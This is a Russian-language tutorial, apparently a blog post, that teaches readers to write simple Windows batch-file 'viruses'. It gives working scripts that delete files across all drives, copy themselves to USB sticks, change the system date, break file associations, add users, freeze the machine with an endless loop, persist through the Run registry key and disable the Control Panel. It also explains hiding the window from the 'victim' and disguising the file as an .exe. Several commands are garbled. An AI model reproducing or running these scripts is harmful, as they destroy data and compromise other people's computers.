Для начала, я откажусь от всякой ответственности за представленный материал и заявлю, что все, что выбудете делать используя информацию, изложенную ниже вы делаете исключительно на свой страх и риск! И, на всякий случай, заявлю, что никаким написанием вирусов я не занимаюсь. Просто когда то было интересно, как это работает и я решил поделиться…
Вы наверняка слышали о сценариях Windows, файлах с расширением *.bat.
Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот, или другой текстовый редактор, а также немного энтузиазма.
Итак, как я уже говорил, сценарий имеет расширение *.bat и является текстовым файлом, значит:
1. Создаем текстовый документ с инструкциями: «Taskmgr»( без кавычек);
2. Сохраняем с любым именем и расширением *.bat;
3. Открываем файл и видим что открылся Диспетчер задач.
Вместо Taskmgr можно указать любую программу(например: mspaint – Paint, Calc – калькулятор). До вирусов еще далеко, но теперь вы знаете как работают сценарии.
Далее напишем программку, которая создает подпапку в папке, где находится сама, а затем копирует себя на флешку, если та вставлена. Итак создаем .bat -файл следующего содержания:
md folder
copy%0 F:program.bat
Запускаем и видим, что в папке, с которой была запущена наша программка, появилась еще одна папка с именем «folder», а на диске F: появился файл «program.bat» содержащий текст нашей программы.
Теперь я приведу перечень строк, которые могут присутствовать в наших программах(вирусах):
1. «copy %0 a:b» — копирует выполняемый файл на диск a в папку b (например copy %0 C: program.bat);
2. «date x.y.z» — меняет дату на x день, y месяц, z год (например date 16.11.05);
3. «time х:у» — меняет время на х часов и у минут (например time 14:27);
4. «label x:y» — переименовывает диск x на имя y (например label C:Disc error);
5. «del *.* /q» — удалит все файлы в папке, где лежит наш сценарий (папки остаются);
6. «del x:y *.* /q» — удалит все файлы на диске х в папке у (кроме папок) (пример del F:Data*.* /q);
7. «assoc .х=.у» — переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.txt);
8. «md х» — создаст папку, в том месте, где находится наш вирус, с именем х (пример md Papka);
9. «net user «х» /add» — добавит на компьютер пользователя под именем х (пример net user «Smoked» /add).
Используя полученные знания, мы можем написать такие вредоносные программки:
1. Меняет дату и время на компьютере и копирует себя на диск С и на флешку:
time 14:13
date 11.07.12
copy %0 C:date.bat
copy %0 F:date.bat
2. Или же удаляет все файлы с флешки, переименовывает её и копирует себя на неё:
del F: *.* /q
label F:error
copy %0 F:deleter.bat
3. Удаляет все файлы с дисков (кроме тех, которые находятся в папках) и меняет дату и время:
del C: *.* /q
del D: *.* /q
del E: *.* /q
del F: *.* /q
time 00:00
date 13.06.23
del *.* /q
Сложно не заметить окно командной строки, которое открывается при запуске наших программ и тут же исчезает… Так вот чтобы его скрыться от жертвы добавляем вначале программы команду «@echo off» также после каждой команды нужно добавить действие, которое скроет строчку «>nul».
После такого усовершенствования наш вирус принимает вид:
@echo off
del C: *.* /q >nul
del D: *.* /q >nul
del E: *.* /q >nul
del F: *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul
Вирус готов! Да вот только кто откроет какой то непонятный файл с непонятным расширением да еще и без иконки? Мало кто! Значит необходимо отконвертировать наш вирус в формат *.exe. для этого можно использовать WinRAR или же еще лучше такую программу как «Bat to exe converter».
В наших вирусах мы можем использовать еще такие скрипты:
1. Меняет клавиши мыши местами:
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
2. Открывает выбранную программу до полного зависания компьютера:
😡 ;
Start mspaint
goto x ;
3. Добавляет наш вирус в автозапуск (!):
copy «»%0″» «%SystemRoot%system32File.bat»
reg add «HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun» /v «Filel» /t REG_SZ /d «%SystemRoot%system32File.bat» /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
Теперь имеем достаточно знаний для написания простеньких вирусов. Напоследок напомню, что писать вирусы это не очень хорошо и я надеюсь что читали вы эту статью исключительно из любопытства. Но, тем не менее удачи. 😉